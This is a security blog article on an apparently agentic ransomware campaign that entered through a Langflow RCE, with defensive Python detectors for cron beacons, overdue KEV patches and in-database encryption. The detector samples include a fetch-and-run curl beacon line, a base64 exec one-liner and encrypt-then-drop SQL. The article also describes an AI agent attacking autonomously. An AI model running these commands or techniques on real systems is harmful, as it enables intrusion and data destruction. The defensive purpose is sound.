Strondex

Ransomware · Agentic Threats

AI Agent Exploits Langflow RCE to Automate Database Ransomware Attack

July 3, 2026 · 6 min read

On July 1, 2026, Sysdig's Threat Research Team published a report on a threat operator they named JADEPUFFER, describing what they assess to be the first fully agentic ransomware operation on record. No human operator was steering each step. An AI agent drove initial access, lateral movement, credential harvesting, and database encryption through what appears to be an autonomous decision loop. The entry point was CVE-2025-3248, a missing-authentication remote code execution flaw in Langflow, the open-source LLM workflow framework. CISA had added that vulnerability to its Known Exploited Vulnerabilities catalog back in May 2025, with a federal remediation deadline of May 26, 2025. For any organization running an unpatched Langflow instance after that date, the exposure window was wide open.

What actually happened

CVE-2025-3248 affects Langflow versions before 1.3.0. The vulnerability sits on the /api/v1/validate/code endpoint, which accepted arbitrary Python code for execution without requiring any authentication. An attacker could send a crafted HTTP request and get code running on the host immediately. At the time CISA flagged it, roughly 466 Langflow servers were reachable from the internet. Sysdig's report does not name the victim organization, and the specific LLM model powering JADEPUFFER's agent was not confirmed in available sources.

Once the agent had a foothold on the Langflow host, it harvested API keys for LLM services and cloud credentials, with a focus on Chinese cloud providers. It also extracted Postgres data stored within the Langflow instance and accessed MinIO object storage using default credentials. The agent established persistence via a crontab beacon that called back to attacker infrastructure every 30 minutes, then pivoted to a production server running a MySQL database alongside an Alibaba Nacos configuration service. It connected to the exposed MySQL port using root credentials, though Sysdig was unable to determine where those credentials originated.
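A host-side check for the persistence step described above, added here as an example and not code from the Sysdig report or this article: it audits crontab entries and flags jobs that run on a short fixed interval and whose command invokes an outbound network client or decodes an inline base64 blob, the shape of a 30-minute callback beacon. The crontab text, the interval threshold and the client list are constructed assumptions for illustration.

```python
"""Audit crontab entries for beacon-like persistence.

Added example, not code from the Sysdig report or this article. It flags
cron jobs that run on a short fixed interval and whose command invokes an
outbound network client or decodes an inline base64 blob, the shape of the
30-minute callback described above. SAMPLE_CRONTAB is constructed input.
"""
import re

# Constructed sample crontab; the callback address is a documentation IP.
SAMPLE_CRONTAB = """\
# m h dom mon dow command
0 2 * * * /usr/local/bin/backup.sh >> /var/log/backup.log 2>&1
*/30 * * * * curl -s http://198.51.100.23/beacon | sh
*/15 * * * * /opt/app/healthcheck.py
0 * * * * python3 -c "import base64,os;exec(base64.b64decode('aW1wb3J0IG9z'))"
@hourly /usr/bin/apt-get update
"""

# Commands that talk to the network or run an inline interpreter (assumed list)
NETWORK_CLIENTS = re.compile(r"\b(curl|wget|ncat|nc|python3?\s+-c)\b")
# Inline base64 decoding, a common way to hide a payload in a one-liner
INLINE_DECODE = re.compile(r"base64\s+(-d|--decode)|b64decode")
# "*/N" in the minute field
STEP_MINUTE = re.compile(r"^\*/(\d+)$")


def parse_line(line):
    """Return (schedule_fields, command) for a job line, or None for comments/blanks."""
    line = line.strip()
    if not line or line.startswith("#"):
        return None
    if line.startswith("@"):                      # @hourly, @daily, ...
        alias, _, cmd = line.partition(" ")
        return [alias], cmd.strip()
    parts = line.split(None, 5)
    if len(parts) < 6:
        return None
    return parts[:5], parts[5]


def interval_minutes(schedule):
    """Best-effort run interval in minutes; None when it cannot be derived."""
    if schedule == ["@hourly"]:
        return 60
    if len(schedule) != 5:
        return None
    minute, hour = schedule[0], schedule[1]
    step = STEP_MINUTE.match(minute)
    if step and hour == "*":
        return int(step.group(1))
    if minute == "*" and hour == "*":
        return 1
    if minute.isdigit() and hour == "*":
        return 60
    return None                                   # daily or more complex schedules


def audit_crontab(text, max_interval=60):
    """Return findings for jobs that beacon-like: frequent and network/decode capable."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        parsed = parse_line(raw)
        if parsed is None:
            continue
        schedule, cmd = parsed
        interval = interval_minutes(schedule)
        reasons = []
        if NETWORK_CLIENTS.search(cmd):
            reasons.append("network client in command")
        if INLINE_DECODE.search(cmd):
            reasons.append("inline base64 decode")
        if reasons and interval is not None and interval <= max_interval:
            findings.append({"line": lineno, "interval_min": interval,
                             "command": cmd, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in audit_crontab(SAMPLE_CRONTAB):
        print(f"line {f['line']}: every {f['interval_min']} min: {', '.join(f['reasons'])}")
        print(f"    {f['command']}")
```

Run it against `crontab -l` output for each service account (and the files under `/etc/cron.d`) as part of the same periodic review that checks for unexpected listening ports; the threshold and client list are deliberately conservative and should be tuned to the host's legitimate jobs.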

The Nacos service received simultaneous attacks on multiple vectors. The agent exploited a CVE-2021-29441-style authentication bypass and also forged tokens using Nacos's widely known default JWT signing key. When an initial attempt to create a backdoor administrator account in Nacos failed, the agent diagnosed the error and issued a corrected, working payload within 31 seconds. Sysdig highlighted that self-correction cycle as the clearest behavioral indicator of autonomous LLM operation. Across the entire operation, more than 600 payloads were captured, each containing plain-language comments consistent with LLM generation, and all delivered as Base64-encoded Python scripts.

The final stage was the ransomware itself. The agent encrypted 1,342 Nacos configuration items using MySQL's built-in AES_ENCRYPT function, then dropped the original configuration and history tables. It created a ransom note as a MySQL table named README_RANSOM containing a Bitcoin address (3J98t1WpEZ73CNmQviecrnyiWrnqRhWNLy) and a Proton Mail contact address ([email protected]). No specific ransom amount has been reported in available sources, and whether any payment was made is unknown.

Why this should matter to you even if you don’t run Langflow

The instinct in this industry is to focus on the AI angle, and that part of the story is genuinely significant. An agent that can diagnose a failed payload and reissue a corrected one in 31 seconds is operating at a speed and consistency that no human operator could match reliably across hundreds of targets. But the uncomfortable truth this incident surfaces is that the AI did not need to be clever. It won because the environment it walked into was poorly hardened.

The three root causes SC Media and Sysdig both called out are ones I have seen in enterprise environments repeatedly: secrets stored in places they should not be, default credentials left active, and privileged database accounts with no scope or time limits on their access. CVE-2025-3248 gave the agent a door, but those hygiene failures gave it a building. If Langflow had been patched to 1.3.0 before the CISA deadline, the agent would have needed a different entry point. If MinIO had not been using default credentials, lateral movement would have slowed or stalled. If the MySQL root account had been locked down, the agent could not have used AES_ENCRYPT as a ransomware primitive inside the database itself.

The reason this matters to organizations that do not run Langflow is that the pattern generalizes. AI agents are increasingly used to automate offensive operations because they handle branching decision trees well, adapt when a technique fails, and produce readable, maintainable code as a side effect. Any exposed management interface, any framework with an unauthenticated code execution endpoint, and any environment where default credentials survive past initial setup is now a viable target for this kind of campaign. The attack surface for agentic threats is not a new category of vulnerability. It is the same inventory of unpatched software, weak credentials, and over-privileged accounts that defenders have always been managing, now being worked by an adversary that does not sleep or lose focus.

The control that would have blunted it

The control that would have had the most impact here is a patch management program disciplined enough to act on CISA KEV additions within the published deadline. CVE-2025-3248 was in the KEV catalog with a federal remediation deadline of May 26, 2025. For organizations following CISA's Binding Operational Directive 22-01 or using KEV as a prioritization signal, that date should have triggered an immediate upgrade to Langflow 1.3.0 or later. In practice, many teams treat KEV as a government problem rather than an actionable priority signal for their own environments, and that is a posture worth reconsidering. Cyber insurers increasingly ask during underwriting and renewal whether the applicant has a documented process for remediating KEV entries within CISA's stated timelines. If your answer is no, that is a gap worth closing before your next renewal.
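A minimal version of the KEV-driven check described above, added here as an example and not code from the article or from CISA: it reads a KEV feed in the published JSON shape, joins it to an asset inventory through a locally maintained fixed-version table, and reports assets still below the patched release together with how many days past the CISA due date they are. The one-entry KEV sample, the `dateAdded` value (the article only says May 2025), the `FIXED_VERSIONS` table and the inventory are all constructed assumptions; the due date and the 1.3.0 fix version are the ones the article states.

```python
"""Flag inventory assets whose CISA KEV due date has passed.

Added example, not code from the article or from CISA. KEV_SAMPLE mirrors
the field names of the published KEV JSON feed (cveID, vendorProject,
product, dateAdded, dueDate, knownRansomwareCampaignUse) but is a
constructed one-entry sample; dateAdded is a placeholder. FIXED_VERSIONS is
an assumed, locally maintained table (the KEV feed does not carry fixed
versions). INVENTORY is constructed.
"""
import json
from datetime import date

KEV_SAMPLE = json.dumps({
    "title": "CISA Catalog of Known Exploited Vulnerabilities",
    "vulnerabilities": [
        {"cveID": "CVE-2025-3248", "vendorProject": "Langflow", "product": "Langflow",
         "dateAdded": "2025-05-05",          # placeholder; article says "May 2025"
         "dueDate": "2025-05-26",            # federal remediation deadline from the article
         "knownRansomwareCampaignUse": "Unknown"},
    ],
})

# Assumed local table: CVE -> (product name as used in the inventory, first fixed release)
FIXED_VERSIONS = {"CVE-2025-3248": ("langflow", "1.3.0")}

# Constructed asset inventory
INVENTORY = [
    {"host": "ml-dev-01", "product": "langflow", "version": "1.2.0"},
    {"host": "ml-dev-02", "product": "langflow", "version": "1.3.0"},
    {"host": "ml-prod-01", "product": "langflow", "version": "1.4.1"},
    {"host": "db-01", "product": "mysql", "version": "8.0.36"},
]


def parse_version(v):
    """Dotted version string -> comparable tuple; non-numeric parts count as 0."""
    return tuple(int(p) if p.isdigit() else 0 for p in v.split("."))


def is_vulnerable(version, fixed):
    """True when the installed version is older than the first fixed release."""
    return parse_version(version) < parse_version(fixed)


def overdue_assets(kev_json, inventory, fixed_versions, today):
    """Return one finding per (asset, KEV entry) where the asset is still unpatched."""
    findings = []
    for entry in json.loads(kev_json)["vulnerabilities"]:
        cve = entry["cveID"]
        if cve not in fixed_versions:
            continue                              # no local fix mapping yet: needs triage
        product, fixed = fixed_versions[cve]
        due = date.fromisoformat(entry["dueDate"])
        for asset in inventory:
            if asset["product"].lower() != product:
                continue
            if not is_vulnerable(asset["version"], fixed):
                continue
            findings.append({
                "host": asset["host"], "cve": cve, "version": asset["version"],
                "fixed_in": fixed, "due": entry["dueDate"],
                "days_overdue": max(0, (today - due).days),
                "ransomware_use": entry.get("knownRansomwareCampaignUse", "Unknown"),
            })
    return findings


if __name__ == "__main__":
    for f in overdue_assets(KEV_SAMPLE, INVENTORY, FIXED_VERSIONS, date.today()):
        print(f"{f['host']}: {f['cve']} {f['version']} < {f['fixed_in']}, "
              f"due {f['due']}, {f['days_overdue']} days overdue")
```

In a real program the feed is fetched from CISA's published JSON URL, the inventory comes from the CMDB or scanner export, and the output feeds a ticket queue with the due date as the SLA; the point of the fixed-version table is that KEV tells you what to fix and by when, but only your own inventory can tell you where.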

Beyond patching, this incident makes the case for several controls that cyber insurers commonly require in policy applications. Credential hygiene, meaning no default passwords surviving into production and secrets stored in a vault rather than in application configuration files or environment variables, would have limited how far the agent could move after the initial compromise. Database access controls, specifically ensuring that the MySQL root account is not reachable from arbitrary internal hosts and that application service accounts have the minimum privileges required, would have made the AES_ENCRYPT ransomware technique harder or impossible to execute. Privileged access management tools exist to enforce these constraints, though maintaining them correctly requires ongoing operational discipline, particularly as infrastructure changes.

Network segmentation is the third layer worth addressing. If the Langflow host had no route to the production MySQL and Nacos server, the pivot that made the ransomware possible would not have happened regardless of what credentials the agent found. Segmentation is often cited in security frameworks and insurance questionnaires as a required control, but in practice it is frequently implemented loosely because tight segmentation creates friction for developers. That tradeoff is real. The question is whether the friction of managing segmentation rules is preferable to the risk of an agent traversing your internal network without resistance. Based on this incident, the math is not close.

Finally, the ransom note appeared as a database table. That is not detectable by a perimeter firewall. Organizations that rely primarily on perimeter controls and do not have visibility into database activity, internal service calls, or unusual process execution on application hosts will not see this kind of attack until after the tables are dropped. Database activity monitoring and endpoint detection on application servers are controls that provide the visibility needed to catch anomalous behavior mid-attack rather than post-mortem.
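The kind of database activity monitoring rule the two paragraphs above argue for, covering the in-database technique described in the "What actually happened" section, added here as an example and not code from the Sysdig report, MySQL or this article: it reads MySQL general-log lines and, per connection, tracks UPDATE statements that rewrite a column through AES_ENCRYPT, DROP TABLE statements that remove a table just rewritten, and CREATE TABLE statements whose name looks like a ransom note, alerting when one connection shows at least two of the three stages. The log lines, the table names and the note-name keywords are constructed assumptions.

```python
"""Detect the encrypt / drop / ransom-note chain in MySQL general-log lines.

Added example, not from the Sysdig report, MySQL or this article. Per
connection (thread id) it tracks UPDATE statements that rewrite a column with
AES_ENCRYPT, DROP TABLE statements that remove a table just rewritten, and
CREATE TABLE statements whose name looks like a ransom note. SAMPLE_LOG is
constructed in the general log's "time thread_id command argument" layout;
config_info and his_config_info are sample table names.
"""
import re
from collections import defaultdict

# Constructed general-log lines (spaces used where the real log has tabs)
SAMPLE_LOG = """\
2026-07-01T03:14:01.000000Z     7 Connect   app@10.0.2.15 on nacos
2026-07-01T03:14:02.000000Z     7 Query     SELECT data_id, content FROM config_info WHERE tenant_id = 'prod'
2026-07-01T03:14:03.000000Z     7 Query     UPDATE config_info SET md5 = 'd41d8cd9' WHERE id = 3
2026-07-01T03:14:05.000000Z    42 Connect   root@10.0.9.77 on nacos
2026-07-01T03:14:06.000000Z    42 Query     SELECT AES_ENCRYPT('probe', 'k')
2026-07-01T03:14:07.000000Z    42 Query     UPDATE config_info SET content = AES_ENCRYPT(content, 'k') WHERE id <= 500
2026-07-01T03:14:08.000000Z    42 Query     UPDATE config_info SET content = AES_ENCRYPT(content, 'k') WHERE id > 500
2026-07-01T03:14:09.000000Z    42 Query     DROP TABLE config_info, his_config_info
2026-07-01T03:14:10.000000Z    42 Query     CREATE TABLE README_RANSOM (note TEXT)
"""

LOG_LINE = re.compile(r"^(\S+)\s+(\d+)\s+(\w+)\s*(.*)$")
UPDATE_TABLE = re.compile(r"^\s*UPDATE\s+`?(\w+)`?", re.I)
AES_CALL = re.compile(r"\bAES_ENCRYPT\s*\(", re.I)
DROP_TABLE = re.compile(r"^\s*DROP\s+TABLE\s+(?:IF\s+EXISTS\s+)?(.+)$", re.I)
CREATE_TABLE = re.compile(r"^\s*CREATE\s+TABLE\s+(?:IF\s+NOT\s+EXISTS\s+)?`?(\w+)`?", re.I)
NOTE_WORDS = ("README", "RANSOM", "RECOVER", "DECRYPT", "HOW_TO")   # assumed keyword list


def parse_log(text):
    """Yield (timestamp, thread_id, command, argument) for each well-formed line."""
    for raw in text.splitlines():
        m = LOG_LINE.match(raw)
        if m:
            ts, thread, command, arg = m.groups()
            yield ts, int(thread), command, arg


def new_state():
    return {"user": None, "first_ts": None, "aes_updates": 0,
            "aes_tables": set(), "dropped": set(), "note_table": None}


def detect_ransomware_chain(text):
    """Return {thread_id: alert} for connections showing at least two of the three stages."""
    state = defaultdict(new_state)
    for ts, thread, command, arg in parse_log(text):
        s = state[thread]
        s["first_ts"] = s["first_ts"] or ts
        if command == "Connect":
            s["user"] = arg.split(" on ")[0]          # "user@host on schema"
            continue
        if command != "Query":
            continue
        upd = UPDATE_TABLE.match(arg)
        if upd and AES_CALL.search(arg):              # stage 1: in-place encryption
            s["aes_updates"] += 1
            s["aes_tables"].add(upd.group(1).lower())
        drop = DROP_TABLE.match(arg)
        if drop:                                      # stage 2: originals destroyed
            s["dropped"].update(n.strip().strip("`").lower() for n in drop.group(1).split(","))
        create = CREATE_TABLE.match(arg)
        if create and any(w in create.group(1).upper() for w in NOTE_WORDS):
            s["note_table"] = create.group(1)         # stage 3: note left as a table
    alerts = {}
    for thread, s in state.items():
        stages = []
        if s["aes_updates"]:
            stages.append("aes_encrypt_update")
        if s["aes_tables"] & s["dropped"]:
            stages.append("dropped_rewritten_table")
        if s["note_table"]:
            stages.append("ransom_note_table")
        if len(stages) >= 2:
            alerts[thread] = {"user": s["user"], "first_ts": s["first_ts"], "stages": stages,
                              "aes_updates": s["aes_updates"], "note_table": s["note_table"]}
    return alerts


if __name__ == "__main__":
    for thread, a in detect_ransomware_chain(SAMPLE_LOG).items():
        print(f"thread {thread} ({a['user']}) from {a['first_ts']}: {', '.join(a['stages'])}")
```

Requiring two stages on one connection keeps a single legitimate `AES_ENCRYPT` update or an ordinary schema migration from paging anyone, while the first bulk `UPDATE ... AES_ENCRYPT` from a root login on an unexpected source address is already worth a lower-severity alert on its own; the same logic applies unchanged to audit-plugin output or a proxy's query log once the line parser is swapped.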

Does Your Ransomware Readiness Cover Agentic Threats?

Download the Strondex ransomware readiness checklist and see how your controls measure up against the techniques JADEPUFFER used to move from initial access to encrypted databases in a single automated session.

If you want to assess how your current controls stack up against an attack pattern like JADEPUFFER's, the Strondex Ransomware Readiness program walks through patching posture, credential hygiene, segmentation, and detection coverage in a structured way that maps directly to what insurers ask for at underwriting.


Sources

  1. Sysdig Threat Research Team - "JADEPUFFER: Agentic Ransomware for Automated Database Extortion": sysdig.com
  2. The Hacker News - "Critical Langflow Flaw Added to CISA KEV Catalog": thehackernews.com
  3. The Register - "Smooth AI Criminal Drives First End-to-End Agentic Ransomware Attack": theregister.com
  4. SC Media - "1st Agentic Ransomware: JADEPUFFER Invades Database at Machine Speed": scworld.com

Reported figures vary by source and were accurate as of publication; this article is general security commentary, not specific security or underwriting advice.